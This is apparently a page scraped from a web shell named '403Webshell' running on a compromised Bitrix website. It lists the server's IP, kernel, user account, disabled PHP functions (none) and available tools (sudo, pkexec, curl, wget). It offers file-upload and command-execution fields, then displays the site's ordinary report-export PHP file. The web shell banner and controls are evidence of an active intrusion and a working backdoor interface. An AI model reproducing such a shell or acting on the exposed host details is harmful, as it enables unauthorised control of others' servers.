403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/components/bitrix/report.view/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/components/bitrix/report.view/stexport.php
<?php
define('NO_KEEP_STATISTIC', 'Y');
define('NO_AGENT_STATISTIC','Y');
define('NO_AGENT_CHECK', true);
define('DisableEventsCheck', true);

require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");
if(!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED!==true)
{
	die();
}

use Bitrix\Main\Localization\Loc;

if(Bitrix\Main\Loader::includeModule('report'))
{
	$errorOccured = false;

	$exportType = isset($_REQUEST['type'])? mb_strtolower($_REQUEST['type']) : '';
	if($exportType === 'csv' || $exportType === 'excel')
	{
		if ($exportType === 'csv')
		{
			$exportFileExt = 'csv';
		}
		else
		{
			$exportFileExt = 'xls';
		}
		$exportFileDir = isset($_SESSION['REPORT_EXPORT_TEMP_DIR']) ? $_SESSION['REPORT_EXPORT_TEMP_DIR'] : '';
		$exportFileName = "report.{$exportFileExt}";
		$exportFilePath = $exportFileDir !== '' ? "{$exportFileDir}{$exportFileName}" : '';

		if($exportFilePath !== '' && file_exists($exportFilePath))
		{
			$file = fopen($exportFilePath, 'rb');
			if(is_resource($file))
			{
				$fileSize = filesize($exportFilePath);
				fclose($file);
				unset($file);
				if ($fileSize !== false)
				{
					while (ob_get_level() > 0)
					{
						ob_end_clean();
					}

					Header('Content-Type: text/csv; charset='.LANG_CHARSET);
					Header("Content-Disposition: attachment;filename={$exportFileName}");
					Header('Content-Type: application/octet-stream');
					Header('Content-Transfer-Encoding: binary');
					Header('Content-Length: '.$fileSize);

					readfile($exportFilePath);
				}
				else
				{
					\Bitrix\Main\Localization\Loc::loadMessages(__FILE__);
					$errMsg = Loc::getMessage('REPORT_VIEW_STEXPORT_ERR_GET_FILE_SIZE').PHP_EOL;
					$errorOccured = true;
				}
			}
		}
		else
		{
			\Bitrix\Main\Localization\Loc::loadMessages(__FILE__);
			$errMsg = Loc::getMessage('REPORT_VIEW_STEXPORT_ERR_FILE_NOT_FOUND').PHP_EOL;
			$errorOccured = true;
		}
	}
	else
	{
		\Bitrix\Main\Localization\Loc::loadMessages(__FILE__);
		$errMsg = Loc::getMessage('REPORT_VIEW_STEXPORT_ERR_INVALID_TYPE').PHP_EOL;
		$errorOccured = true;
	}

	if ($errorOccured)
	{
		$bom = chr(239).chr(187).chr(191);
		$fileSize = mb_strlen($errMsg) + mb_strlen($bom);

		while (ob_get_level() > 0)
		{
			ob_end_clean();
		}

		Header('Content-Type: text/csv; charset='.LANG_CHARSET);
		Header("Content-Disposition: attachment;filename=error.txt");
		Header('Content-Type: application/octet-stream');
		Header('Content-Transfer-Encoding: binary');
		Header('Content-Length: '.$fileSize);

		if ($bom !== '')
		{
			echo $bom;
		}
		echo $errMsg;
	}
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit